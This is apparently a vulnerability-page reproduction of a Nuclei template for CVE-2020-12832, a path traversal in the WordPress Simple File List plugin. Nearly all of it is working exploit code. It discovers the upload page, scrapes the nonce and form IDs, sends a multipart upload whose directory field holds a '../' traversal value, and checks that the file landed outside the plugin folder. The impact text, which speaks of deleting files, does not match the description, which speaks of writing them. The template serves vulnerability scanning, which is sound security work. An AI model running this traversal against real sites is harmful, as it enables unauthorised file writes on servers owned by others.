漏洞描述
Simple File List plugin allows path traversal via file upload, enabling files to be written outside the upload directory.
CVE-2020-12832: WordPress Simple File List - Path Traversal
PoC代码[已公开]
id: CVE-2020-12832
info:
name: WordPress Simple File List - Path Traversal
author: riteshs4hu
severity: critical
description: |
Simple File List plugin allows path traversal via file upload, enabling files to be written outside the upload directory.
impact: |
Attackers can delete arbitrary files on the server, potentially causing data loss or service disruption.
remediation: |
Update to version 4.2.8 or later.
reference:
- https://wpscan.com/vulnerability/422360b9-4c70-4fd9-9833-375f1294bd7a/
- http://nvd.nist.gov/vuln/detail/CVE-2020-12832
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-12832
epss-score: 0.73235
epss-percentile: 0.9874
cwe-id: CWE-22
cpe: cpe:2.3:a:simplefilelist:simple-file-list::::::wordpress::*
metadata:
verified: true
max-request: 3
vendor: Simple File List
product: Simple File List WordPress Plugin
tags: cve,cve2020,wp,wordpress,wp-plugin,traversal,simple-file-list,lfi,vkev
variables:
rand: "{{rand_base(7)}}"
http:
- raw:
- |
GET /?rest_route=/wp/v2/pages&per_page=100 HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: slug
json:
- '.[] | select(.content.rendered | contains("eeSFL_UploadGo")) | .slug'
internal: true
- raw:
- |
GET {{slug}}/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: sflnonce
group: 1
regex:
- 'name="ee-simple-file-list-upload-nonce"[^>]*?value="([A-Za-z0-9]+)"'
internal: true
- type: regex
name: sflid
group: 1
regex:
- 'id="eeSFL_ID">([0-9]+)'
internal: true
- type: regex
name: ext
group: 1
regex:
- 'eeSFL_FileFormats\s*=\s*"([A-Za-z0-9]+)'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytA7kTuCe4IHDaUBZ
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="action"
sfl_upload_job
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="file"; filename="{{rand}}.{{ext}}"
Content-Type: application/octet-stream
{{rand}}
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="eeSFL_ID"
{{sflid}}
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="eeSFL_FileUploadDir"
wp-content%2Fuploads%2Fsimple-file-list%2F..%2F
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="ee-simple-file-list-upload"
{{sflnonce}}
------WebKitFormBoundarytA7kTuCe4IHDaUBZ--
- raw:
- |
GET /wp-content/uploads/{{rand}}.{{ext}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "{{rand}}")'
condition: and
# digest: 4a0a0047304502202dfd8d78501f770a9603f0ef6373236de5865783c3090c6bbf8c5010523d881f0221009e9ae1dfb09035b715ea286d7033092c16b8a42c4aa4a3c5af46f2ae19b35eab:922c64590222798bb761d5b6d8e72950